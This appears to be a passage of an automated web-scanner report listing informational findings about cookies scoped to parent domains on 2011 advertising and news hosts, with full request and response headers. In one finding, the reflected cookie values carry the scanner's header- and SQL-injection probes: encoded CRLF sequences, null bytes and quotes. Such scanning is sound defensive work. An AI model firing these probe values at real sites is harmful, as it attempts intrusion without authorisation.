Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.61. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; rdk2=0; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2663ab8%0D%0A01bb4e98c34%3D1%262f3e7%250d%250abefce76579c%3D1%26658e0%00%0D%0A6b8eb56a945%3D1%264210330d2%0D%0A8b1ecee0312%3D1%26421091ced%250d%250af3ebd5f25d3%3D1%264210aa2c8%00%0D%0A9382c866592%3D1%264210%27%3D1%264210%2527%3D1%264210%00%27%3D1%264210%22%3D1%264210%3D1%267751%3D1; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C6069c2e85f977687d81d3d36%264210%3D14657%2C0%2C32%2C%2C%2663ab8%0D%0A01bb4e98c34%3D14657%2C0%2C1%2C%2C%262f3e7%250d%250abefce76579c%3D14657%2C0%2C1%2C%2C%26658e0%00%0D%0A6b8eb56a945%3D14657%2C0%2C1%2C%2C%264210330d2%0D%0A8b1ecee0312%3D14657%2C0%2C1%2C%2C%26421091ced%250d%250af3ebd5f25d3%3D14657%2C0%2C1%2C%2C%264210aa2c8%00%0D%0A9382c866592%3D14657%2C0%2C1%2C%2C%264210%27%3D14657%2C0%2C1%2C%2C%264210%2527%3D14657%2C0%2C1%2C%2C%264210%00%27%3D14657%2C0%2C1%2C%2C%264210%22%3D14657%2C0%2C1%2C%2C%267751%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.62. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C2%2C%2C%267751%3D14657%2C0%2C65%2C%2C; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.63. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set HTTP/1.1
Host: r.openx.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:25 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.64. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:00 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3033228098597162936&rnd=3093449532631709493&fpid=4&nu=n&t=
...[SNIP]...

13.65. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgtix=/QABADAB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

13.66. http://segments.adap.tv/data

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data?p=quantcast-lal&type=gif&segment=D,T&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"42\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.67. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/?p=brilig&type=gif&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1315096975548 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: usatprod=R1449690983; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close


13.69. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 43017
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

13.70. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 37055
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.
pluckAppProxy.registerPlugin("pluck/comments/comments.js",
// init function, c
...[SNIP]...

13.71. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 53489
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.

pluckAppProxy.registerPlugin("pluck/pluck.js",
   // init function, called fir
...[SNIP]...

13.72. http://sync.adap.tv/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:31 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.73. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Date: Sun, 04 Sep 2011 01:24:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.74. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:13 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:13 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:13 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; path=/; expires=Sun, 04-Sep-11 01:36:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
